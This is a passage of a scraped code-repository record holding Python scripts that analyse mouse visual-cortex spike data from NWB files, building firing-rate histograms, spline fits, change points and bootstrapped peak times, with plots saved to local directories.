plt.ylabel('Spikes/second')\n plt.xlabel('Bins')\n plt.title(\"Mouse: \" + str(MOUSE_ID) + \" / \" + probe_name + \" in \"+ probe.name + \". Cell: \" + str(cell))\n plt.plot(xs, lsq(xs), color = 'magenta', alpha=0.9) \n plt.bar(b[0:len(b)-1], curr_cell)\n plt.savefig(CELL_PLOTS_DIRECTORY + cell_filename + \".png\")\n plt.clf() \n # End Plotting (1) ####################\n \n # Plotting normalized probe activity\n z = fromFreqList(x)\n x,b,c = plt.hist(z, bins)\n plt.clf()\n ###\n \n ### Normalization\n # also divide by number of neurons in that particular region\n x /= num_trials*(0.001)*len(probe.getCellList())\n \n # Need to find the two maxes and two mins\n\n ################# Finding peaks and valleys #######################\n # First we find the first peak and the time it occurs at.\n probe.max_frate = max(x[0:500]) \n probe.max_ftime = np.where(x[0:500] == probe.max_frate)[0][0]\n \n # Now first valley\n probe.min_frate = min(x[0:probe.max_ftime]) \n probe.min_ftime = np.where(x[0:probe.max_ftime] == probe.min_frate)[0][0] \n \n # Now second peak\n probe.max_frate2 = max(x[200:300]) \n probe.max_ftime2 = np.where(x[200:300] == probe.max_frate2)[0][0] + 200\n \n # Last valley\n probe.min_frate2 = min(x[probe.max_ftime:probe.max_ftime2])\n probe.min_ftime2 = np.where(x[probe.max_ftime:probe.max_ftime2] == probe.min_frate2)[0][0] + probe.max_ftime\n \n # The value it converges towards the end.\n probe.converge = min(x[probe.max_ftime2:500])\n \n # Average firing rate + standard deviation\n probe.avg_frate = np.mean(x[0:500])\n probe.std = np.std(x[0:500])\n\n # Smoothed Function\n lsq = LSQUnivariateSpline(bins[0:len(bins)-1], x, knots)\n probe.lsq = lsq\n \n # Get the change point here \n cpm_result = cpm.detectChangePoint(FloatVector(lsq(xs[probe.min_ftime-5:probe.max_ftime+1])), cpmType='Student', ARL0=1000)\n cpm_result = robj_to_dict(cpm_result)\n \n # Set chnage point and change point time\n probe.change_pt = lsq(cpm_result['changePoint'][0]+probe.min_ftime-5)\n probe.chg_time = cpm_result['changePoint'][0]+probe.min_ftime-5\n ###################################################################\n \n \n if(DESCRIPTIONS):\n print(repr(probe))\n \n # Plotting (2) ###############################################\n if(PLOTTING):\n # Plotting\n plt.axvline(x=probe.chg_time, color='red', linestyle='--', alpha=0.7)\n plt.ylim(0, 12)\n plt.xlim(-20, 500)\n plt.ylabel('Spikes/second')\n plt.xlabel('Bins')\n plt.title(\"Mouse: \" + str(MOUSE_ID) + \" / \" + probe_name + \" in \"+ probe.name)\n plt.plot(xs, lsq(xs), color = 'red') \n plt.bar(b[0:len(b)-1], x, alpha=0.8)\n plt.savefig(PROBE_PLOTS_DIRECTORY + probe_filename + \".png\")\n \n plt.clf()\n \n with open(probe_filename, 'wb') as f:\n pickle.dump(probe, f)\n # End Plotting (2) ###########################################\n\n \n\n# Plotting (3) ###############################################\n# Here, we'll plot all curves for every region for a given mouse.\nprobes = []\n\n# First, lets order the probe in terms of the time in which the max firing rate occurs\nfor probe_name in probe_names:\n \n probe_filename = MOUSE_ID + \"_\" + probe_name\n\n with open(probe_filename, 'rb') as f:\n # Plotting all curves for every region for a given mouse.\n probe = pickle.load(f)\n\n probes.append(probe)\n\nprobes.sort(key=lambda x: x.max_ftime)\n\n# Finally, we can plot\nfor i in range(0, len(probes)):\n\n probe = probes[i]\n plt.ylabel('Firing Rate (Spikes/second)')\n plt.xlabel('Bins (ms)')\n plt.ylim(0, 12)\n plt.xlim(-20, 500)\n plt.title(\"Mouse: \" + str(MOUSE_ID) + \" | Average Firing Rates\")\n plt.plot(xs, probe.lsq(xs), label = probe.name, color=colors[i])\n\nplt.legend()\nplt.savefig(SUMMARY_PLOTS_DIRECTORY + str(MOUSE_ID) + \".png\")\nplt.clf()\n# End Plotting (3) ###########################################\n\n" }, { "alpha_fraction": 0.5907312631607056, "alphanum_fraction": 0.6120975017547607, "avg_line_length": 25.165353775024414, "blob_id": "6d88e6eadf71ac1a30c2ff8a7a360a08488ab9b2", "content_id": "7da0cafdabcde93e35e656ac832e4b3e6eba5bdf", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3323, "license_type": "no_license", "max_line_length": 77, "num_lines": 127, "path": "/nwb_plots_percentile.py~", "repo_name": "bjmedina/PSTH", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Jul 1 11:50:02 EDT 2019\n\n@author: Bryan Medina\n\"\"\"\n###### Imports ########\nfrom nwb_plots_functions import *\nfrom scipy.interpolate import LSQUnivariateSpline\n\nimport h5py as h5\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport os\nimport pickle\nimport sys\n########################\n\n###### UPDATE PATH #################################\nDIRECTORY = '/Users/bjm/Documents/CMU/Research/data'\nVAR_DIREC = '/Users/bjm/Documents/CMU/Research/data/plots/variations/'\nSUMMARY_PLOTS_DIRECTORY = '/Users/bjm/Documents/CMU/Research/data/plots/'\nMOUSE_ID = '405751'\n####################################################\n\n# Get file from directory\nspikes_nwb_file = os.path.join(DIRECTORY, 'mouse' + MOUSE_ID + '.spikes.nwb')\nnwb = h5.File(spikes_nwb_file, 'r')\n\nprobe_names = nwb['processing']\n\n# save all curves for all regions\nmid = {}\ntop = {}\nbot = {}\n\nfor probe_name in probe_names:\n # Calculate median neuron, and also 90th and 10th percentile neuron\n median_n = []\n top_ten = []\n bot_ten = []\n \n probe_filename = MOUSE_ID + \"_\" + probe_name\n\n with open(probe_filename, 'rb') as f:\n probe = pickle.load(f)\n \n for xval in xs:\n \n rates = []\n \n for cell in probe.getCellList():\n rates.append(probe.getCell(cell).lsq(xval))\n\n # Sort this list...\n rates.sort()\n \n median_n.append(np.median(rates))\n top_ten.append(np.percentile(rates, 85))\n bot_ten.append(np.percentile(rates, 15))\n \n # save the curves\n mid[probe_name] = LSQUnivariateSpline(xs, median_n, knots[1:-1])\n top[probe_name] = LSQUnivariateSpline(xs, top_ten, knots[1:-1])\n bot[probe_name] = LSQUnivariateSpline(xs, bot_ten, knots)\n\n\n# Plotting median, 85th percentile, and 15th percentile neuron\n\n# Median\nfor probe_name in probe_names:\n \n probe_filename = MOUSE_ID + \"_\" + probe_name\n\n with open(probe_filename, 'rb') as f:\n probe = pickle.load(f)\n \n plt.ylim(0, 5)\n plt.xlim(-20, 500)\n plt.title(\"Median Neuron Activity for Mouse \" + str(MOUSE_ID))\n plt.ylabel('Spikes/second')\n plt.xlabel('Bins')\n plt.plot(xs, mid[probe_name](xs), label=probe.name)\n\nplt.legend()\nplt.savefig(SUMMARY_PLOTS_DIRECTORY + str(MOUSE_ID) + \"_MEDIAN.png\")\nplt.clf()\n\n# 85th\nfor probe_name in probe_names:\n \n probe_filename = MOUSE_ID + \"_\" + probe_name\n\n with open(probe_filename, 'rb') as f:\n probe = pickle.load(f)\n \n plt.ylim(0, 20)\n plt.xlim(-20, 500)\n plt.title(\"85th Percentile Neuron Activity for Mouse \" + str(MOUSE_ID))\n plt.ylabel('Spikes/second')\n plt.xlabel('Bins')\n plt.plot(xs, top[probe_name](xs), label=probe.name)\n\nplt.legend()\nplt.savefig(SUMMARY_PLOTS_DIRECTORY + str(MOUSE_ID) + \"_85TH.png\")\nplt.clf()\n\n\n# 15th\nfor probe_name in probe_names:\n \n probe_filename = MOUSE_ID + \"_\" + probe_name\n\n with open(probe_filename, 'rb') as f:\n probe = pickle.load(f)\n \n plt.ylim(0, 1)\n plt.xlim(-2, 500)\n plt.title(\"15th Percentile Neuron Activity for Mouse \" + str(MOUSE_ID))\n plt.ylabel('Spikes/second')\n plt.xlabel('Bins')\n plt.plot(xs, bot[probe_name](xs), label=probe.name)\n\nplt.legend()\nplt.savefig(SUMMARY_PLOTS_DIRECTORY + str(MOUSE_ID) + \"_15TH.png\")\nplt.clf()\n" }, { "alpha_fraction": 0.4629461467266083, "alphanum_fraction": 0.4828033745288849, "avg_line_length": 35.00467300415039, "blob_id": "f4687a441ea74c420c5249dc45163213cf7230b9", "content_id": "173ca3ac655494b3ec846ef78077caf0e67c6144", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 7705, "license_type": "no_license", "max_line_length": 119, "num_lines": 214, "path": "/nwb_trials.py", "repo_name": "bjmedina/PSTH", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Jun 12 09:25:21 EDT 2019\n\n@author: Bryan Medina\n\"\"\"\nfrom nwb_plots_functions import *\n# READ ME ################################\n'''\nThis file\n- Gets the different values for t1, t2, ..., t5, beta1, beta2, ..., beta5 for each trial\n- Compares then all against each other.\n'''\n##########################################\n\n## CHANGE ME #############################################################\n# Data directory\nDIRECTORY = '/Users/bjm/Documents/CMU/Research/data/'\nTRIAL_DATA = '/Users/bjm/Documents/CMU/Research/data/trial_data/'\nTRIAL_PLOTS = '/Users/bjm/Documents/CMU/Research/data/plots/trials/'\nTMAX_DIREC = '/Users/bjm/Documents/CMU/Research/data/tmax/'\nMOUSE_ID = '421338'\n##########################################################################\n\n\n# Get file from directory\nspikes_nwb_file = os.path.join(DIRECTORY, 'mouse' + MOUSE_ID + '.spikes.nwb')\nnwb = h5.File(spikes_nwb_file, 'r')\n\nprobe_names = nwb['processing']\n\n# Whether or not we want to calculate the confidence intervals\nCONF_INTERVAL = True\nBOOTSTRAPS = 500\n\ntrials = []\nt_max1 = []\nt_max2 = []\n\n# Changes depending on the trial.\nstart = 0 #in second\nend = 2000 #in seconds\n\n# time stamps ( this never changes )\n# This is SPECIFICALLY for the 'drifting_gratings_2' stimulus\ntimestamps = nwb['stimulus']['presentation']['drifting_gratings_2']['timestamps'].value\nstim_orient = nwb['stimulus']['presentation']['drifting_gratings_2']['data'].value\n\nPLOTTING = False\n## For every region,\nfor probe_name in probe_names:\n\n print(probe_name)\n # File to get data from\n probe_filename = DIRECTORY + MOUSE_ID + \"_\" + probe_name\n\n try:\n with open(probe_filename, 'rb') as f:\n probe = pickle.load(f)\n\n except FileNotFoundError:\n\n for probe_name in probe_names:\n saveProbeData(MOUSE_ID, probe_name, nwb)\n\n ## For EVERY trial,\n for trial_number in range(len(timestamps)):\n print(\"Trial number %d\" % trial_number)\n # Check if we have this file\n\n try: \n trial_file = TRIAL_DATA + \"/\" + MOUSE_ID + \"/\" + probe_name + \"/tr_\" + str(trial_number)\n with open(trial_file, 'rb') as t:\n tr = pickle.load(t)\n trials.append(tr)\n\n except FileNotFoundError:\n trial = timestamps[trial_number]\n freq = stim_orient[trial_number][1]\n angle = stim_orient[trial_number][3]\n\n # Checking for 'nans'\n if not (str(freq) == \"nan\") or not (str(angle) == \"nan\"):\n freq = int(freq)\n angle = int(angle)\n \n config = str(freq) + \"_\" + str(angle)\n \n ## go through every cell in that region,\n ## find out how that cell is behaving IN THE TRIAL'S TIME FRAME,\n ## and save that activity to a vector...\n \n ## do that for every trial... essentially make PSTHs for every trial...\n curr_trial = np.zeros((len(bins), 1))\n \n for cell in probe.getCellList():\n spikes = nwb['processing'][probe_name]['UnitTimes'][str(cell)]['times'].value\n stimulus_spikes = binarySearch(spikes, trial, 0, len(spikes)-1)\n \n if not (type(stimulus_spikes) == type(-1)):\n stimulus_spikes = (stimulus_spikes - trial[0])\n stimulus_spikes *= 1000\n \n for stim_spike in stimulus_spikes:\n curr_trial[insertToBin(stim_spike, end)] += 1\n\n ########################\n tr = Trial()\n tr.number = trial_number\n tr.config = config\n tr.spikes = curr_trial\n # tr.t\n # tr.beta\n\n z = fromFreqList(curr_trial)\n curr_trial,b,c = plt.hist(z, bins)\n plt.clf()\n\n curr_trial /= 0.001*len(probe.getCellList())\n\n tr.spikes = curr_trial\n tr.lsq = LSQUnivariateSpline(bins[0:len(bins)-1], curr_trial, knots)\n #tr.lsq = UnivariateSpline(bins[0:len(bins)-1], curr_trial)\n\n trials.append(tr)\n #######################\n with open(trial_file, 'wb') as t:\n pickle.dump(tr, t)\n\n if(PLOTTING):\n plt.xlim(-2, 500)\n plt.ylim(0, 50)\n plt.ylabel('Spikes/second')\n plt.xlabel('Bins')\n plt.title(\"Mouse: \" + str(MOUSE_ID) + \" | \" + probe_name + \" trial: \" + str(tr.number) + \" | \" + tr.config)\n plt.bar(bins[0:len(bins)-1], tr.spikes, alpha=0.8, color='blue')\n plt.plot(xs, tr.lsq(xs), color='red', alpha=0.4)\n plt.show()\n #plt.savefig(TRIAL_PLOTS + MOUSE_ID + \"/\" + probe_name + \"/\" + \"tr_\"+str(trial_number))\n plt.clf()\n \n\n\n if(CONF_INTERVAL):\n # Calculating the confidence intervals\n fname = TMAX_DIREC + MOUSE_ID + \"/\" + probe_name + \"/\" + MOUSE_ID + \"_tmax_\"\n\n try:\n with open(fname + \"1\", 'rb') as f:\n t_max1 = pickle.load(f)\n\n with open(fname + \"2\", 'rb') as f:\n t_max2 = pickle.load(f)\n\n except FileNotFoundError:\n # We're doing 500 bootstraps\n for i in range(0, BOOTSTRAPS):\n print(\"BOOTSTRAP %d\" % i)\n # g is going to be our random sample, size 600, of the 600 trials\n g = choices(trials, k = len(trials))\n \n sample_spikes = np.zeros((len(g[0].spikes),))\n lsq = np.zeros((len(g[0].lsq(xs)), 1))\n \n # Now we need to construct our curves based on these 600 samples\n for sample in g:\n # Need to add all spikes together\n ## To do this, we have to *essentially* do an element wise addition\n for j in range(0, len(sample.spikes)):\n sample_spikes[j] += sample.spikes[j]\n\n # Recompute tmax_1 and tmax_2\n ## We have to normalize sample_spikes by number of trials\n sample_spikes /= len(g)\n peak = max(sample_spikes[0:500])\n tmax_1 = np.where(sample_spikes[0:500] == peak)[0][0]\n \n peak2 = max(sample_spikes[200:300])\n tmax_2 = np.where(sample_spikes[200:300] == peak2)[0][0] + 200\n \n if(PLOTTING):\n print(\"Peak 1: %d @ %d\" % (peak, tmax_1))\n print(\"Peak 2: %d @ %d\" % (peak, tmax_2))\n plt.ylim(0, 10)\n plt.xlim(-2, 500)\n plt.bar(bins[:-1], sample_spikes, alpha=0.8, color='blue')\n plt.axvline(x=tmax_1,color='red', linestyle='--')\n plt.axvline(x=tmax_2,color='red', linestyle='--')\n \n plt.show()\n plt.clf()\n \n # Save those two into two separate vectors\n t_max1.append(tmax_1)\n t_max2.append(tmax_2)\n \n\n \n # clear the slate for the next probe \n trials = []\n \n with open(fname + \"1\", 'wb') as f:\n pickle.dump(t_max1, f)\n\n \n with open(fname + \"2\", 'wb') as f:\n pickle.dump(t_max2, f)\n\n t_max1 = []\n t_max2 = []\n\n \nfname = TMAX_DIREC + MOUSE_ID + \"/\" + probe_name + \"/\" + MOUSE_ID + \"_tmax_\"\n" }, { "alpha_fraction": 0.5249219536781311, "alphanum_fraction": 0.5413135886192322, "avg_line_length": 26.258358001708984, "blob_id": "2f63b48769300fc5480243ebcec90eacb9591c10", "content_id": "ccf2cdf8756aca2f3b6f0877468a392590bdc265", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 17936, "license_type": "no_license", "max_line_length": 377, "num_lines": 658, "path": "/nwb_plots_functions.py", "repo_name": "bjmedina/PSTH", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Jun 12 09:25:21 EDT 2019\n\n@author: Bryan Medina \n\"\"\"\n###### Imports ########\nfrom random import choices\nfrom rpy2.robjects.vectors import StrVector\nfrom rpy2.robjects.vectors import FloatVector\nfrom scipy.interpolate import LSQUnivariateSpline\nfrom scipy.interpolate import CubicSpline\nfrom scipy.interpolate import UnivariateSpline\n\nimport h5py as h5\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport os\nimport pickle\nimport rpy2.robjects as robjects\nimport rpy2.robjects.packages as rpackages\nimport sys\n########################\n\n# Setting up packages for rpy2 use\npackage_name = 'cpm'\n\nif rpackages.isinstalled(package_name):\n have_package = True\n print(\"R package %s already installed\" % package_name)\nelse:\n have_pakcage = False\n\nif not have_package:\n utils = rpackages.importr('utils')\n utils.chooseCRANmirror(ind=1)\n\n utils.install_packages(package_name)\n print(\"installed R package: %s\" % package_name)\n\ncpm = rpackages.importr(package_name)\n##################################\n\n### This is for the 'drifting gratings' stimulus\n# All possible temporal frequencies for the stimulus\ntemp_freqs = [1, 2, 4, 8, 15]\n\n# All possible orientations of stimulus (angles)\norientations = [i*45 for i in range(8)]\n\n# Knots for spline (selected by eye)\nknots = [30, 50, 52, 55, 65, 70, 75, 80, 83, 100, 150, 200, 250, 300, 325, 375, 400]\ntr_knots = [50, 110, 160, 200, 250, 300, 350, 400, 450]\n\n# Number of times timulus is presented\nnum_trials = 600\n\n# Conversion frmo ms to s\nmsToSec = 1000 # 1000 ms in 1 sec\n\n# For future plotting\nxs = np.linspace(0,600,3000)\n\n# Start and end of trials\nstart = 0\nend = 2000\n\n# Bin width\nwidth = 1\n\n# Actual bins (for later use)\nbins = np.linspace(start, end, int( (end - start)/width + 1 ))\n\n# Probe to region mapping\nmapping = {'probeA': 'AM',\n 'probeB': 'PM',\n 'probeC': 'V1',\n 'probeD': 'LM',\n 'probeE': 'AL',\n 'probeF': 'RL'}\n\ncolors = ['k', '#9400D3', 'b', 'g', '#FF7F00', 'r']\n\n###\n\nclass Probe:\n\n # Max firing rate and the time it occurs\n max_frate = 0\n max_ftime = 0\n\n # Second highest firing rate\n max_frate2 = 0\n max_ftime2 = 0\n\n # Min firing rate and the time it occurs\n min_frate = 0\n min_ftime = 0\n\n # Second lowest \n min_frate2 = 0\n min_ftime2 = 0\n\n # Average firing rate that is converged to as t -> 500 ms \n converge = 0\n\n # Change point (before the first peak)\n change_pt = 0\n chg_time = 0 \n\n # Average firing rate\n avg_frate = 0\n\n # Standard deviation of the firing rates\n std = 0\n\n # LSQUnivariate function \n lsq = \" \"\n \n def __init__(self, nwb, name):\n '''\n Description\n -----------\n Constructor\n \n Input(s)\n --------\n 'nwb': h5py._hl.files.File. 'spikes.nwb' dataset. \n 'probe': string. name of probe.\n \n Output(s)\n ---------\n New 'Probe' object\n '''\n \n self.__cells = getProbeCells(nwb, name)\n self.name = mapping[name]\n \n def getCell(self, cell_number):\n '''\n Description\n -----------\n Method returns dictionary of cell \"at index 'cell_number'\"\n \n Input(s)\n --------\n 'cell_number': int. key of a corresponding cells\n \n Output(s)\n ---------\n Dictionary of cell 'cell_number'\n '''\n \n return self.__cells[cell_number]\n\n def getCellList(self):\n '''\n Description\n -----------\n Method returns dictionary of cells\n \n Output(s)\n ---------\n Dictionary of cell 'cell_number'\n '''\n\n return self.__cells.keys()\n\n def __repr__(self):\n '''\n Description\n -----------\n Method replaces default '__str__' with one that prints out average spiking rate, 2 maximum and 2 minimum firing rates, and the time in which they occur. \n\n Output(s)\n ---------\n String to print.\n '''\n\n return \"%s\\t Avg: %3.2f Std: %3.2f | Max: %3.2f @ %d | Max2: %3.2f @ %d | Min: %3.2f @ %d | Min2: %3.2f @ %d | Converges to %3.2f | Change: %3.2f @ %d\" % (self.name, self.avg_frate, self.std, self.max_frate, self.max_ftime, self.max_frate2, self.max_ftime2, self.min_frate, self.min_ftime, self.min_frate2, self.min_ftime2, self.converge, self.change_pt, self.chg_time)\n\n def __str__(self):\n '''\n Description\n -----------\n Method replaces default '__repr__' with one that's great for LaTeX-table making.\n\n Output(s)\n ---------\n String to print.\n '''\n\n return \"%s & %3.2f & %3.2f & (%3.2f, %d) & (%3.2f, %d) & (%3.2f, %d) & (%3.2f, %d) & %3.2f & (%3.2f, %d)\\\\\\\\\" % (self.name, self.avg_frate, self.std, self.max_frate, self.max_ftime, self.max_frate2, self.max_ftime2, self.min_frate, self.min_ftime, self.min_frate2, self.min_ftime2, self.converge, self.change_pt, self.chg_time)\n\ndef getProbeCells(nwb, probe):\n '''\n Description\n -----------\n 'GetProbeCells' gets dataset and returns all cells, for a given probe, that are in the Visual Cortex.\n \n Input(s)\n --------\n 'nwb': h5py._hl.files.File. 'spikes.nwb' dataset. \n 'probe': string. name of probe.\n \n Output(s)\n ---------\n 'v_cells': dict. Dictionary that all cells that are in V.\n '''\n \n # Get all cells with activity in V\n cells = nwb['processing'][probe]['unit_list'].value\n v_cells = {} \n \n for cell in cells:\n region = nwb['processing'][probe]['UnitTimes'][str(cell)]['ccf_structure'].value.decode('utf-8')\n \n if region[0] == 'V' or region[0] == 'v':\n v_cells[cell] = Cell()\n \n return v_cells\n\n\nclass Cell:\n\n max_frate = 0\n max_ftime = 0\n avg_frate = 0\n std = 0\n name = \" \" \n lsq = \" \"\n # Change point (before the first peak)\n change_pt = 0\n chg_time = 0 \n \n def __init__(self):\n '''\n Description\n -----------\n Constructor\n \n Output(s)\n ---------\n New 'Cell' object\n '''\n self.__table = makeTable()\n\n def getSpikes(self, config):\n '''\n Description\n -----------\n Method returns table for given cell\n \n Input(s)\n --------\n 'config': string. key of dictionary.\n \n Output(s)\n ---------\n table at certain config\n '''\n return self.__table[config]\n\n def addSpike(self, config, spike, end):\n '''\n Description\n -----------\n Method adds 1 to spike counts\n \n Input(s)\n --------\n 'config': string. key of dictionary.\n 'spike' : time of spike in seconds\n 'end' : end of trial \n \n Output(s)\n ---------\n table at certain config\n '''\n # Find out index spike needs to be in.\n bn = insertToBin(spike, end)\n \n # Add one to ongoing count.\n self.__table[config][bn] += 1\n\n def __str__(self):\n '''\n Description\n -----------\n Method replaces default '__str__' with one that prints out average spiking rate, 2 maximum and 2 minimum firing rates, and the time in which they occur. \n\n Output(s)\n ---------\n String to print.\n '''\n return \"Max: %3.2f\\t Avg: %3.2f\\t Std: %3.2f\" % (self.max_frate, self.avg_frate, self.std)\n\nclass Trial:\n # The trial number\n number = -1\n\n # The configuration\n config = \"\"\n\n # Should be five values for each of these\n t = [None]*5\n beta = [None]*5\n\n # Need to make this go from start to end ... This will hold the PSTH.\n spikes = np.zeros((len(bins), 1))\n\n lsq = []\n\n def __add__(self, other_trial):\n '''\n Description\n -----------\n Method overrides '+' operator so that you can add two Trial objects\n\n Input(s)\n --------\n 'other_trial': Trial. Another trial object\n \n Output(s)\n ---------\n sum of two trials (adds spiking histogram)\n '''\n pass\n \n\ndef makeTable():\n '''\n Description\n -----------\n 'makeTable' creates a dictionary to keep track of time bins for each possible orientation of stimulus. One for each cell.\n \n Output(s)\n ---------\n 'table': dict. Dictionary that contains orientation combination as key and all cells that are in V.\n '''\n\n bins = np.linspace(start, end, int( (end - start)/width + 1 )) \n \n # In this table, each key is a different configuration of the stimulus\n # and each row corresponds to spikes in a time bin.\n table = {}\n\n for freq in temp_freqs:\n \n for angle in orientations:\n\n config = str(freq) + \"_\" + str(angle) \n table[config] = np.zeros((len(bins), 1))\n\n \n return table\n\ndef binarySearch(spikes, interval, start, end):\n '''\n Description\n -----------\n 'binarySearch' will find the index of a spike in a certain interval. Once it finds the index of a spike in the interval, it will try to find all the spikes that are in that interval. Essentially a modified take on the classic binary search algorithm.\n \n Input(s)\n --------\n 'spikes' : list. list of all spikes of a given neuron.\n 'interval': list. current time interval of stimulus (usually about 2 seconds).\n 'start' : int. beginning\n 'end' : int. end\n\n\n Output(s)\n ---------\n list. Returns list of spikes in a given interval (first spike is found using binary search, the rest with the 'spikesInInterval' method. \n '''\n \n if end >= 1:\n \n mid_point = midpoint(start, end)\n \n # If our spike is inside the interval, let's return the index\n if inside(spikes[mid_point], interval):\n return spikesInInterval(spikes, interval, mid_point)\n\n # If our spike is greater than (or less than) the interval, let's adjust checking bounds\n elif spikes[mid_point] > interval[1]:\n\n next_midpoint = midpoint(start, mid_point-1)\n\n # If this is true, then we're going to hit a recursion error...\n # We don't want that to happen.\n if mid_point == next_midpoint:\n return -1\n \n return binarySearch(spikes, interval, start, mid_point-1)\n\n elif spikes[mid_point] < interval[0]:\n \n next_midpoint = midpoint(mid_point+1, end)\n \n # If this is true, then we're going to hit a recursion error...\n # We don't want this. \n if mid_point == next_midpoint:\n return -1\n \n return binarySearch(spikes, interval, mid_point+1, end)\n\n else:\n\n return -1\n\n\ndef spikesInInterval(spikes, interval, known):\n '''\n Description\n -----------\n 'spikesInInterval' will find all spikes in a certain interval based on the index of one found in the interval. \n \n Input(s)\n --------\n 'spikes' : list. list of all spikes of a given neuron.\n 'interval': list. current time interval of stimulus (usually about 2 seconds).\n 'known' : int. Index in 'spikes' of a known spike in the interval.\n\n Output(s)\n ---------\n 'spike_set': set. indices of all spikes in the interval. This is converted to a list when returned.\n '''\n\n # Index of known spike\n i = known\n\n # Boolean variables we'll be using to determine if we're either checking 'above' or 'below' the known value.\n # 'DOWN' is true because we'll start by checking below the known spike\n DOWN = True\n UP = False\n\n # Set of spikes. We'll be using a set because 1) sets can't have duplicates and 2) checking for duplicates can be done in constant O(1) time. \n spike_set = set()\n \n # We don't want to check out of bounds of the spikes list.\n while i > -1 and i < len(spikes):\n\n if inside(spikes[i], interval) and DOWN:\n spike_set.add(spikes[i])\n i = i - 1\n \n elif not inside(spikes[i], interval) and DOWN:\n i = known + 1\n UP = True\n DOWN = False\n \n elif inside(spikes[i], interval) and UP:\n spike_set.add(spikes[i])\n i = i + 1\n \n elif not inside(spikes[i], interval) and UP:\n break\n\n # Convert set to list, then return.\n return np.array(list(spike_set))\n \n\ndef inside(spike, interval):\n '''\n Description\n -----------\n 'inside' will determine if a spike is in an interval.\n \n Input(s)\n --------\n 'spikes' : list. list of all spikes of a given neuron.\n 'interval': list. current time interval of stimulus (usually about 2 seconds).\n\n Output(s)\n --------\n boolean. True if spike is in interval. False otherwise.\n '''\n \n return spike >= interval[0] and spike <= interval[1]\n\n\ndef midpoint(start_rate, end_rate):\n '''\n Description\n -----------\n 'midpoint' will calculate midpoint between two points\n \n Input(s)\n --------\n 'start_rate' : int. beginning\n 'end_rate' : int. end\n\n Output(s)\n --------\n int. midpoint between 'start_rate' and 'end_rate'\n '''\n \n return int(start_rate + (end_rate - start_rate)/2)\n\n \ndef insertToBin(spiketime, end):\n '''\n Description\n -----------\n 'insertToBin' will bin that a spiketime belongs in\n \n Input(s)\n --------\n 'spiketime' : int. spike time in ms\n 'end' : int. end of trial\n\n Output(s)\n --------\n int. idx. Index that the spiketime belongs to\n ''' \n \n idx = int( (spiketime - (spiketime % width)) / width )\n \n if( idx > end ): \n #print(\"spiketime \" + str(spiketime) + \"\\tidx \" + str(idx))\n idx = end\n\n return idx \n\n\n\ndef saveProbeData(MOUSE_ID, probe_name, nwb):\n '''\n Description\n -----------\n 'saveProbeData' save the data, using pandas, of a certain mouse given a certain probe.\n \n Input(s)\n --------\n 'MOUSE_ID' : int. ID of mouse we'll be looking at\n 'probe_name': string. name of probe\n 'nwb' : h5py._hl.files.File. Dataset\n\n Output(s)\n --------\n None.\n '''\n \n # Changes depending on the trial.\n start = 0 #in second\n end = 2000 #in seconds\n \n # time stamps ( this never changes )\n # This is SPECIFICALLY for the 'drifting_gratings_2' stimulus\n timestamps = nwb['stimulus']['presentation']['drifting_gratings_2']['timestamps'].value\n stim_orient = nwb['stimulus']['presentation']['drifting_gratings_2']['data'].value\n \n \n ## Adding spikes\n # Get all cells that are in V for every probe\n #print(probe_name)\n probe = Probe(nwb, probe_name)\n \n # Going to want to save this information later.\n filename = MOUSE_ID + \"_\" + probe_name\n \n # ...get every cell. Then...\n cells = probe.getCellList()\n \n # ... for every cell...\n for cell in cells:\n \n # (Getting current cell)\n curr_cell = probe.getCell(cell)\n \n # ...get the current cells spiking activity.\n spikes = nwb['processing'][probe_name]['UnitTimes'][str(cell)]['times'].value\n \n # For every occurrence of each kind of stimulus\n for i in range(len(timestamps)):\n \n # Extract interval of stimulus, temporal frequency of stimulus, and angle of stimulus.\n trial = timestamps[i]\n freq = stim_orient[i][1]\n angle = stim_orient[i][3]\n \n # Checking for 'nans'\n if not (str(freq) == \"nan\") or not (str(angle) == \"nan\"):\n \n freq = int(freq)\n angle = int(angle)\n \n # Convert freq and angle to something that can be used as an index. \n config = str(freq) + \"_\" + str(angle) \n \n # Search for all spikes that are in this time frame. \n stimulus_spikes = binarySearch(spikes, trial, 0, len(spikes)-1)\n \n \n if not (type(stimulus_spikes) == type(-1)):\n # questionable but should do the trick (to get everything between 0 and 2000 ms)\n stimulus_spikes = (stimulus_spikes - trial[0])\n \n stimulus_spikes *= 1000\n \n # For all the spikes you just found, add them to the their respective bin.\n for stim_spike in stimulus_spikes:\n curr_cell.addSpike(config, stim_spike, end)\n \n print(\"Saving to \" + filename)\n \n with open(filename, 'wb') as f:\n pickle.dump(probe, f)\n \n\ndef fromFreqList(x):\n '''\n Description\n -----------\n 'fromFreqList' converts frequency list to a list of repitions based on index. This is usefull for histograms.\n\n Example\n -------\n fromFreqList([2,1,4,2]) => [0,0,1,2,2,2,2,3,3]\n \n Input(s)\n --------\n 'x': list of ints. \n\n Output(s)\n --------\n 'z': list of ints.\n ''' \n z = []\n for i in range(len(x)):\n y = [ i for ii in range(int(x[i])) ]\n for num in y:\n z.append(num)\n\n return z\n\ndef robj_to_dict(robj):\n '''\n Description\n -----------\n 'robj_to_dict' converts an R object to a python dictionary\n \n Input(s)\n --------\n 'robj': R object \n\n Output(s)\n --------\n dictionary.\n\n Source\n ------\n https://medium.com/bigdatarepublic/contextual-changepoint-detection-with-python-and-r-using-rpy2-fa7d86259ba9\n \n ''' \n return dict(zip(robj.names, map(list, robj)))\n" } ]
10
Superbeet/Radar-Chart
https://github.com/Superbeet/Radar-Chart
a7461ac222402aec374bc7e14b918b18ae0e592f
99932b27395372cd27820ab705c62b7dc0ae3c1b
6e5864db2cacc99b97452f0344cdf056c15c1b79
refs/heads/master
2016-09-05T23:50:17.497778
2014-07-23T18:22:59
2014-07-23T18:22:59
22,126,438
0
0
null
null
null
null
null
